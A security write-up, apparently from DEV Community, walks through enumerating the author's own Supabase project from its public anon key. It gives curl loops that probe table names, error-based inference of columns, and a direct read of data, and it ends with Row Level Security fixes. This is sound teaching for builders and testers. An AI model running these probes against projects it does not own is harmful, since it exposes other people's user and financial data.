By RUGERO Tesla (@404Saint)
The methodology matters more than the target
Most recon write-ups focus on the finding. This one focuses on the process.
The target here is a Supabase project I own. Controlled lab, no real user data. I gave myself only what an attacker would realistically have: the project URL and the anon key sitting in the frontend bundle. No dashboard access. No schema knowledge. No tools beyond curl and a small Python script.
The goal wasn't to find a vulnerability. It was to document what passive enumeration and error-based inference actually look like when executed methodically, step by step. The same reasoning that drives my ICS/OT reconnaissance work drives this walkthrough: observe first, infer from behavior, reconstruct what you can't see directly, never touch what you don't have to.
The target is different. The methodology is the same.
Step 0: What you start with
Every Supabase project exposes two things in the frontend by default: the project URL and the anon key. The anon key is a JWT. Before making a single network request, decoding it already tells you something:
{
"iss": "supabase",
"ref": "<project-ref>",
"role": "anon",
"iat": 1771624280,
"exp": 2087200280
}
Two observations worth making before you do anything else. The role is anon, which means this key authenticates as the anonymous PostgreSQL role and inherits whatever permissions the developer explicitly granted it. And the expiry is ten years out. If this key appears in a public repository or gets scraped from a frontend bundle, an attacker has a decade of access with no forced rotation.
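Reading the payload takes nothing beyond base64 and json, since we only want the claims, not signature verification. A minimal sketch (the token below is fabricated with the same claim structure as a real anon key, not an actual credential):

```python
import base64
import json

def decode_jwt_payload(token: str) -> dict:
    """Decode a JWT's payload without verifying the signature.
    Enough for passive recon: we only want to read the claims."""
    payload_b64 = token.split(".")[1]
    # Base64url payloads are usually unpadded; restore padding before decoding.
    payload_b64 += "=" * (-len(payload_b64) % 4)
    return json.loads(base64.urlsafe_b64decode(payload_b64))

# Build a fabricated anon-style token (header.payload.signature) for illustration.
claims = {"iss": "supabase", "ref": "example-ref", "role": "anon",
          "iat": 1771624280, "exp": 2087200280}
header = base64.urlsafe_b64encode(
    json.dumps({"alg": "HS256", "typ": "JWT"}).encode()).decode().rstrip("=")
body = base64.urlsafe_b64encode(json.dumps(claims).encode()).decode().rstrip("=")
token = f"{header}.{body}.signature"

decoded = decode_jwt_payload(token)
print(decoded["role"])  # -> anon: the PostgreSQL role this key maps to
print((decoded["exp"] - decoded["iat"]) / (365 * 24 * 3600))  # key lifetime, ~10 years
```

No network traffic, no log entries on the target, and you already know the role and the rotation window.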
Passive intelligence gathering before active enumeration. Know what you're working with.
Step 1: Try the obvious path first
The first probe is always the most direct one. PostgREST exposes an OpenAPI endpoint that would hand you the entire schema immediately if it responds:
curl "https://<project>.supabase.co/rest/v1/" \
-H "apikey: <anon_key>"
Response: {"message":"Invalid API key","hint":"Only the service_role API key can be used for this endpoint."}
Locked. The obvious path is closed.
This is where a lot of recon stops. It shouldn't. A failed probe isn't a dead end; it's information. You now know that schema discovery via OpenAPI requires elevated credentials, which means the developer configured at least that part correctly. The lockdown raises the bar from immediate to wordlist-dependent. That's a meaningful distinction, not a wall.
Step 2: Wordlist enumeration and what response codes tell you
With no schema available directly, you fall back to inferring structure through behavior. Common table names, systematic probing, reading the response codes.
for table in users profiles accounts orders assignments messages disputes notifications user_roles; do
STATUS=$(curl -s -o /dev/null -w "%{http_code}" \
"https://<project>.supabase.co/rest/v1/$table?select=*" \
-H "apikey: <anon_key>" \
-H "Authorization: Bearer <anon_key>")
echo "$table -> $STATUS"
done
The response codes are the signal:
- 200 means the table exists, it's accessible, and nothing is blocking you
- 403 means the table exists but something is blocking you
- 404 means the table doesn't exist
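The interpretation step is mechanical enough to encode directly. A minimal sketch (the `classify` helper and its labels are mine, not part of any Supabase tooling):

```python
def classify(status: int) -> str:
    """Map a PostgREST HTTP status code to what it implies about the table."""
    if status == 200:
        return "exists, readable"    # table exists and the anon role can select from it
    if status in (401, 403):
        return "exists, blocked"     # table exists but permissions stop the read
    if status == 404:
        return "not found"           # no such table, or not exposed through the API
    return f"unexpected ({status})"  # rate limiting, server errors, etc.

# Feed it the status codes collected by the curl loop above.
results = {"profiles": 200, "users": 404, "orders": 403}
for table, status in results.items():
    print(f"{table} -> {classify(status)}")
```

Keeping the interpretation in code rather than in your head matters once the wordlist grows past a handful of names: you want consistent conclusions, not per-request judgment calls.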
Results from my project:
profiles -> 200
user_roles -> 200
assignments -> 200
messages -> 200
disputes -> 200
notifications -> 200
Six tables. All accessible. This isn't because I disabled access controls. It's because I never enabled them. That distinction matters and I'll come back to it.
The pattern here is worth internalizing. You're not looking for a vulnerability in the traditional sense. You're observing how the system responds to different inputs and reading what those responses imply about underlying structure. This is the same logic that drives behavioral fingerprinting in MEA: real devices and simulated ones respond differently under observation, and those differences tell you things you couldn't get by asking directly.
Step 3: Schema reconstruction through error-based inference
The OpenAPI spec is locked. But PostgREST's error messages are not, and that asymmetry is exploitable.
POSTing a request that references a nonexistent column returns PGRST204. POSTing with a real column returns something different: a constraint error, a type mismatch, a permission failure. The distinction leaks column existence without requiring any elevated access.
for col in id user_id email nickname university department level banned created_at; do
RESP=$(curl -s -X POST ".../rest/v1/profiles" \
-H "apikey: <key>" \
-H "Content-Type: application/json" \
-d "{\"$col\": \"probe\"}")
echo "$col -> $RESP"
done
Confirmed columns in profiles: id, user_id, nickname, university, department, level, created_at, updated_at.
Not found: email, banned.
Full schema reconstruction. No OpenAPI access. No elevated credentials. Just systematic probing and reading what the error responses imply.
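The decision rule fits in a few lines. A sketch of the interpretation logic (the helper name and the sample response bodies are illustrative, shaped like PostgREST errors rather than copied from real output):

```python
import json

def column_exists(response_body: str) -> bool:
    """Infer column existence from a PostgREST error response.
    PGRST204 means the column was not found in the schema cache;
    any other error code (constraint violation, type mismatch,
    permission failure) means PostgREST recognized the column
    before the request failed for a different reason."""
    try:
        err = json.loads(response_body)
    except json.JSONDecodeError:
        return False  # not an error payload we can interpret
    return err.get("code") != "PGRST204"

# Illustrative response bodies for the two cases.
missing = '{"code":"PGRST204","message":"Could not find the email column"}'
present = '{"code":"23502","message":"null value in column id violates not-null constraint"}'
print(column_exists(missing))  # False -> column does not exist
print(column_exists(present))  # True  -> column exists; the request failed later
```

The asymmetry is the whole trick: the schema endpoint is locked, but every error response is a one-bit oracle about schema structure, and bits accumulate.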
This is error-based inference, and it appears across disciplines. In network recon, you read ICMP responses to infer firewall rules. In ICS environments, you observe register behavior to distinguish real devices from simulators. The underlying pattern is always the same: systems communicate their internal state through their responses, even when they're trying not to.
Step 4: Confirming access with a direct read
With table names and column structure mapped, the final step is confirming what's actually readable:
curl ".../rest/v1/assignments?select=*" \
-H "apikey: <key>" \
-H "Authorization: Bearer <key>"
Response:
[{
"id": "0155e342-...",
"student_id": "74aae5f9-...",
"title": "design",
"subject": "chem",
"deadline": "2026-04-09T06:30:00+00:00",
"budget": 2500.0,
"status": "open",
"sla_tier": "priority",
"payment_status": "none",
"escrow_status": "none"
}]
In a production environment with real users, that's financial data, user identifiers, and status information, all readable by anyone holding a frontend key that's exposed by design.
Total time from zero knowledge to reading data: under ten minutes. One credential. A wordlist of ten common table names. Standard curl.
The methodology, extracted
The four-step pattern here generalizes:
Start passive. Decode what you already have before sending a single packet. The JWT alone told me the role, the project reference, and the key lifetime.
Try the direct path first. The OpenAPI endpoint would have given everything immediately. It failed, but the failure was informative. Never skip the obvious probe: if it works you're done early, if it fails you know something.
Infer from behavior when direct access fails. Response codes, error messages, timing differences. Systems leak information about their internal state constantly. Read it systematically.
Reconstruct before you read. Map the structure first, then confirm access. Going straight to data reads without understanding the schema means you'll miss things and make noise you didn't need to make.
This is the same sequence whether the target is a web API, a network perimeter, or an industrial protocol implementation. The tools change. The thinking doesn't.
The Supabase-specific finding
For anyone building on Supabase: Row Level Security is not enabled by default on tables created through SQL. Every such table is immediately readable by the anon role through the PostgREST API until you explicitly enable RLS and write policies:
ALTER TABLE profiles ENABLE ROW LEVEL SECURITY;
CREATE POLICY "users can view own profile"
ON profiles FOR SELECT
USING (auth.uid() = user_id);
Without this, your anon key lives in your frontend bundle, is always public, and acts as a read key for your entire database. Enable RLS before you write application logic, not after.
Conducted against a project I own. No real user data involved. The record in assignments was seeded during development.
All my projects: github.com/404saint
Built by RUGERO Tesla · GitHub: @404Saint
Offensive security researcher focused on ICS/OT, infrastructure security, and attack surface analysis.
This article was originally published by DEV Community and written by 404Saint.